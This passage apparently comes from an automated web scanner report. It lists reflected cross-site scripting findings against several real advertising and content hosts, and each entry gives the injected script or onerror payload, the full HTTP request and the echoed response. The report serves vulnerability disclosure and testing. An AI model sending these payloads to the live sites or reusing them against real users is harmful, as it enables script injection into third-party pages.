<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.1.1;target=_blank;grp=1473244827;misc=177283690&7047e"><script>alert(1)</script>84b7f80ebaa=1;adiframe=y">
...[SNIP]...

1.224. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e633"><script>alert(1)</script>acb95e1ea6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe5e633"><script>alert(1)</script>acb95e1ea6/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 322

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn5e633"><script>alert(1)</script>acb95e1ea6/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.225. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e8a5"><script>alert(1)</script>8134445c0f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.06e8a5"><script>alert(1)</script>8134445c0f1/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.06e8a5"><script>alert(1)</script>8134445c0f1/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.226. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8d1"><script>alert(1)</script>4a5700d9774 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.12d8d1"><script>alert(1)</script>4a5700d9774/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.12d8d1"><script>alert(1)</script>4a5700d9774/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.227. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79373"><script>alert(1)</script>4ced219a5aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/136911479373"><script>alert(1)</script>4ced219a5aa/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/136911479373"><script>alert(1)</script>4ced219a5aa/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.228. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d71e"><script>alert(1)</script>80dfd50a855 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/04d71e"><script>alert(1)</script>80dfd50a855/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/04d71e"><script>alert(1)</script>80dfd50a855/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.229. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97d12"><script>alert(1)</script>21c00572e4f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-197d12"><script>alert(1)</script>21c00572e4f/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-197d12"><script>alert(1)</script>21c00572e4f/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.230. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdaed"><script>alert(1)</script>bf9c26a8d19 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-1/sizefdaed"><script>alert(1)</script>bf9c26a8d19=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-1/sizefdaed"><script>alert(1)</script>bf9c26a8d19=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.231. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [alias parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of the alias request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35ae5"><script>alert(1)</script>bae12da53c4 was submitted in the alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=549974103935ae5"><script>alert(1)</script>bae12da53c4 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=549974103935ae5"><script>alert(1)</script>bae12da53c4;adiframe=y">
...[SNIP]...

1.232. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43184"><script>alert(1)</script>268ab098d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039&43184"><script>alert(1)</script>268ab098d45=1 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 326

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039&43184"><script>alert(1)</script>268ab098d45=1;adiframe=y">
...[SNIP]...

1.233. http://odb.outbrain.com/utils/get [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/get

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a0654<script>alert(1)</script>49c55aa1899 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /utils/get?url=http%3A%2F%2Fuk.reuters.com%2Farticle%2FidUKTRE71C1YB20110213&callback=outbrain_rater.returnedOdbData(${json},0)a0654<script>alert(1)</script>49c55aa1899&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=34100&ref=&apv=false&rand=0.5271956750657409&sig=Ff9vsySQ HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=3c60260a-1d8b-4ff2-80ef-7d4e1a46ea5e; _lvs2="Z5ekOTFEcZgntHcTxW2I63QfcUoUv0qhtWmjNsOQ6c0="; _lvd2="uvYbqndUp4oGL81GggzPAj9NbxhOHOrBfGWrvBU5HcM="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1297647380027; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="Z5ekOTFEcZgntHcTxW2I63QfcUoUv0qhlLidDM1W/uGQlaVAQ/tI3Q=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 12-Mar-2012 01:36:20 GMT; Path=/
Set-Cookie: _lvd2="uvYbqndUp4oGL81GggzPAj9NbxhOHOrBq0wY9bjkiCMEtu+eLYf3CQ=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sun, 20-Feb-2011 14:24:20 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 12-Mar-2012 01:36:20 GMT; Path=/
Set-Cookie: recs-98b44cb774fd02fd18559597da304954="bPmNSD4EdkQfTcxXO3IbzODj1tUcqGdac9Y1u51O9pcWTxMsM4Sk+CRl0Q8Po4rSMcGqA6kc4x3UMdgdNIMGwS2VLb3EJlEUkzVk0Zh4eYV1v5FjLMguSOtw5rpmzPNIhDKxqp7mHEZ5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 14-Feb-2011 01:41:20 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:36:19 GMT
Content-Length: 9775

outbrain_rater.returnedOdbData({'response':{'exec_time':25,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'187236313','req_id':'0d5dd9641c563b2519e3826e3e34503f'},'score':{'preferred
...[SNIP]...
<\/span>','raterMode':'none','defaultRecNumber':5}}},0)a0654<script>alert(1)</script>49c55aa1899

1.234. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://offers-service.cbsinteractive.com
Path:	/offers/script.sc

Issue detail

The value of the offerId request parameter is copied into the HTML document as plain text between tags. The payload 4b9c2<script>alert(1)</script>e6884640a74 was submitted in the offerId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /offers/script.sc?offerId=864b9c2<script>alert(1)</script>e6884640a74 HTTP/1.1
Host: offers-service.cbsinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 88
Date: Mon, 14 Feb 2011 01:39:38 GMT

// Offer id 864b9c2<script>alert(1)</script>e6884640a74 does not exists or is not ACTIVE

1.235. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [&callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oscar.wapolabs.com
Path:	/RevenuePlatform/ad/generate

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload f4578<script>alert(1)</script>ead23a8fea2 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325f4578<script>alert(1)</script>ead23a8fea2&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:01 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1203

jsonp1297647421325f4578<script>alert(1)</script>ead23a8fea2({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","date
...[SNIP]...

1.236. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [assocId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oscar.wapolabs.com
Path:	/RevenuePlatform/ad/generate

Issue detail

The value of the assocId request parameter is copied into the HTML document as plain text between tags. The payload b9198<img%20src%3da%20onerror%3dalert(1)>2e70df75fb1 was submitted in the assocId parameter. This input was echoed as b9198<img src=a onerror=alert(1)>2e70df75fb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20b9198<img%20src%3da%20onerror%3dalert(1)>2e70df75fb1&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:05 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20b9198<img src=a onerror=alert(1)>2e70df75fb1","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","key
...[SNIP]...

1.237. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [commercialNode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oscar.wapolabs.com
Path:	/RevenuePlatform/ad/generate

Issue detail

The value of the commercialNode request parameter is copied into the HTML document as plain text between tags. The payload 65d5f<img%20src%3da%20onerror%3dalert(1)>139c3531da8 was submitted in the commercialNode parameter. This input was echoed as 65d5f<img src=a onerror=alert(1)>139c3531da8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

